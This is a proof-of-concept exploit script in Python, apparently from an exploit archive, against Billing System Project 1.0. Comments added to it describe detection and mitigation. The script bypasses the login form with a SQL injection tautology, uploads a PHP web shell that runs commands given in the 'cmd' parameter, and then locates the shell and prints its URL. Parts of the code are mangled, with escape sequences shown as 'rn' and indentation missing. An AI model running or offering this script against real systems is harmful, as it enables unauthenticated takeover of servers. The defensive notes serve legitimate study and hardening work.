Authored by Talha Demirsoy

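Billing System Project version 1.0 suffers from a remote shell upload vulnerability. The proof of concept below first bypasses the login form with SQL injection, then uploads a PHP file through the product image field of php_action/createProduct.php.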

# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 06.07.2021
# Exploit Author: Talha DEMİRSOY
# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html
# Version: V 1.0
# Tested on: Linux & Windows

import requests
import random
import string
from bs4 import BeautifulSoup

# Two random 15-letter lowercase strings: `shellname` becomes the uploaded
# file's base name and `randstr` the product name. Because both change on every
# run, a fixed file name is not a usable indicator; match on the file extension
# and the upload path instead.
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
randstr = ''.join(random.choice(let) for i in range(15))

# Content of the uploaded file: a PHP snippet that passes the `cmd` query
# parameter to system() and echoes the output inside <pre> tags.
# Detection: any file under an image/upload directory that contains PHP tags,
# or that calls system() on request parameters, is not a legitimate product image.
payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd =
($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

# Base URL of the application, read interactively. It is concatenated directly
# with relative paths below, so it is expected to end with "/".
url = input("Target : ")

# One requests session is reused for every call, so any cookie set by the login
# response is sent with the later requests.
session = requests.session()

# Step 1: login bypass. The username field carries a SQL tautology
# (' or '1'='1') followed by '#'. This only works if login.php builds its query
# by concatenating the submitted username; the server code is not shown on this
# page, so that is inferred. The '#' is a comment marker in some SQL dialects
# (e.g. MySQL) and would discard the password check.
# Mitigation: use prepared statements / bound parameters in the login query.
# Detection: quote characters and "or" tautologies in the username field of
# POSTs to login.php.
# The response is not inspected, so the script never confirms the login worked.
reqUrl = url + "login.php"
reqHead = {"Content-Type": "application/x-www-form-urlencoded"}
reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''}
session.post(reqUrl, headers=reqHead, data=reqData)

# Step 2: file upload through the "create product" form handler.
print("Shell Uploading...")

# A hand-written multipart/form-data body is posted to
# php_action/createProduct.php on the session used for the login request.
reqUrl = url + "php_action/createProduct.php"
reqHead = {"Content-Type": "multipart/form-data;
boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"}
# Form fields sent: currnt_date, productImage, productName, quantity, rate,
# brandName, categoryName, productStatus, create.
# The security-relevant part is `productImage`: its filename ends in ".php",
# its declared type is application/octet-stream, and its content is `payload`.
# If the server stores it, the handler applies no effective allow-list to
# uploaded file names or content (inferred; the handler is not shown here).
# Mitigation: accept only known image extensions and verify the content really
# is an image; generate the stored file name server-side; keep uploads outside
# the web root or disable script execution in the upload directory.
# Detection: multipart POSTs to createProduct.php whose productImage filename
# does not have an image extension.
reqData =
"rnrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="currnt_date"rnrnrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data; name="productImage";
filename=""+shellname+".php"rnContent-Type:
application/octet-streamrnrn"+payload+"rnrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="productName"rnrn"+randstr+"_TalhaDemirsoyrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="quantity"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="rate"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="brandName"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="categoryName"rnrn2rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="productStatus"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="create"rnrnrn------WebKitFormBoundaryOGdnGszwuETwo6WB--rn"
# The upload response is discarded; success is only checked indirectly, by the
# product listing lookup that follows.
session.post(reqUrl, headers=reqHead, data=reqData)

# Step 3: report the generated names and find where the upload was stored.
print("product name is "+randstr)
print("shell name is "+shellname)

# product.php is fetched on the same session and parsed for <img> tags. The
# listing page itself reveals the stored path of each product image.
reqUrl = url + "product.php"
data = session.get(reqUrl)

parser = BeautifulSoup(data.text, 'html.parser')
find_shell = parser.find_all('img')

# Any <img> whose src contains the random file name is taken as the location of
# the uploaded file, and a URL with "?cmd=whoami" appended is printed. That the
# src is directly requestable means uploads sit under a web-served path.
# Detection: HTTP requests carrying a `cmd` query parameter to files in the
# product image directory, and any .php file appearing in that directory.
for i in find_shell:
if shellname in i.get("src"):
print("Shell URL : " + url + i.get("src") + "?cmd=whoami")